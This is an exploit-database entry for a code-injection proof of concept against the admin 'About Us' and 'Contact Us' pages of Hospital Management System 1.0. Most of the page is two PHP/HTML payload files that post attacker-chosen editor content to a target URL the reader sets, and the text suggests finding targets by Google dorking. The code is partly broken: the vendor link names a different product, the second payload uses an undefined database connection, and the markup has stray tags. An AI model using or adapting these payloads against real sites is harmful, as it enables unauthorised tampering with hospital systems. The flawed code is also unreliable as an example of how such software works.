Vulners
Lucene search
Hospital Management System 1.0 Code Injection
`=============================================================================================================================================
| # Title : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Part 01 : about-us.php
[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php .
[+] Line 2 : Make sure to include your database connection here
[+] Line 44 : Send the form data using fetch API (Set your target url)
[+] save payload as poc.php in your localhost path .
[+] payload :
<?php
include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here
if (isset($_POST['submit'])) {
$pagetitle = $_POST['pagetitle'];
$pagedes = $con->real_escape_string($_POST['pagedes']);
$query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");
if ($query) {
echo '<script>alert("About Us has been updated.")</script>';
} else {
echo '<script>alert("Something Went Wrong. Please try again.")</script>';
}
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>indoushka | Update About Us Content</title>
<!-- NicEdit Script -->
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
<script type="text/javascript">
// Apply NicEdit to all text areas when the DOM is loaded
bkLib.onDomLoaded(nicEditors.allTextAreas);
// Function to handle form submission using JavaScript
function submitForm(event) {
event.preventDefault(); // Prevent default form submission
const pagetitle = document.getElementById('pagetitle').value;
const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content
// Prepare the form data to be sent
const formData = new FormData();
formData.append('pagetitle', pagetitle);
formData.append('pagedes', pagedes);
formData.append('submit', true);
// Send the form data using fetch API
fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {
method: 'POST',
body: formData,
})
.then(response => response.text())
.then(data => {
alert('About Us content has been updated successfully.');
console.log(data); // Handle the response from the server
})
.catch(error => {
console.error('Error:', error);
});
}
</script>
<style>
/* Center the form container */
.editor-container {
max-width: 800px;
margin: 0 auto; /* Center horizontally */
padding: 20px;
text-align: center; /* Center the content inside */
}
/* Ensure the textarea takes the full width */
#pagedes {
width: 100%;
height: 300px;
margin: 0 auto;
}
</style>
</head>
<body>
<div id="app">
<div class="app-content">
<div class="main-content">
<div class="wrap-content container" id="container">
<!-- Page Title Section -->
<section id="page-title">
<div class="row">
<div class="col-sm-8">
<h1 class="mainTitle">Update the About Us Content</h1>
</div>
</li>
</ol>
</div>
</section>
<!-- Form Section -->
<div class="container-fluid container-fullw bg-white">
<div class="row">
<div class="col-md-12">
<!-- Centering the form using a wrapper div -->
<div class="editor-container">
<form class="forms-sample" method="post" onsubmit="submitForm(event);">
<div class="form-group">
<label for="pagetitle">Page Title</label>
<input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
</div>
<div class="form-group">
<label for="pagedes">Page Description</label>
<!-- NicEdit will enhance this textarea -->
<textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
</div>
<button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
</form>
</div>
</div>
</div>
</div>
<!-- End Form Section -->
</div>
</div>
</div>
</div>
<!-- Footer -->
</body>
</html>
---------------------- [+] Part 02 : contact.php [+] --------------------
[+] Line 4 : Make sure to include your database connection here
[+] Line 60 : Send the form data using fetch API (Set your target url)
[+] save payload as poc.php in your localhost path .
[+] payload :
<?php
// عنوان الخادم الخارجي
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';
// جلب البيانات من الخادم الخارجي
$response = file_get_contents($url);
// التحقق من وجود البيانات
if ($response !== FALSE) {
// التعامل مع البيانات
echo $response;
} else {
echo 'حدث خطأ أثناء جلب البيانات.';
}
if (isset($_POST['submit'])) {
$pagetitle = $_POST['pagetitle'];
$pagedes = $con->real_escape_string($_POST['pagedes']);
$email = $con->real_escape_string($_POST['email']);
$mobnum = $con->real_escape_string($_POST['mobnum']);
$query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");
if ($query) {
echo '<script>alert("Contact Us has been updated.")</script>';
} else {
echo '<script>alert("Something Went Wrong. Please try again.")</script>';
}
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Admin | Update Contact Us Content</title>
<!-- NicEdit Script -->
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
<script type="text/javascript">
bkLib.onDomLoaded(nicEditors.allTextAreas);
function submitForm(event) {
event.preventDefault();
const pagetitle = document.getElementById('pagetitle').value;
const pagedes = nicEditors.findEditor('pagedes').getContent();
const email = document.getElementById('email').value;
const mobnum = document.getElementById('mobnum').value;
const formData = new FormData();
formData.append('pagetitle', pagetitle);
formData.append('pagedes', pagedes);
formData.append('email', email);
formData.append('mobnum', mobnum);
formData.append('submit', true);
fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {
method: 'POST',
body: formData,
})
.then(response => response.text())
.then(data => {
alert('Contact Us content has been updated successfully.');
console.log(data);
})
.catch(error => {
console.error('Error:', error);
});
}
</script>
<style>
.editor-container {
max-width: 800px;
margin: 0 auto;
padding: 20px;
text-align: center;
}
#pagedes {
width: 100%;
height: 300px;
margin: 0 auto;
}
</style>
</head>
<body>
<div id="app">
<div class="app-content">
<div class="main-content">
<div class="wrap-content container" id="container">
<section id="page-title">
<div class="row">
<div class="col-sm-8">
<h1 class="mainTitle">Admin | Update Contact Us Content</h1>
</div>
<ol class="breadcrumb">
<li class="active">
<span>Update Contact Us Content</span>
</li>
</ol>
</div>
</section>
<div class="container-fluid container-fullw bg-white">
<div class="row">
<div class="col-md-12">
<div class="editor-container">
<form class="forms-sample" method="post" onsubmit="submitForm(event);">
<div class="form-group">
<label for="pagetitle">Page Title</label>
<input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
</div>
<div class="form-group">
<label for="pagedes">Page Description</label>
<textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
</div>
<div class="form-group">
<label for="email">Email</label>
<input id="email" name="email" type="email" class="form-control" required>
</div>
<div class="form-group">
<label for="mobnum">Mobile Number</label>
<input id="mobnum" name="mobnum" type="text" class="form-control" required>
</div>
<button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4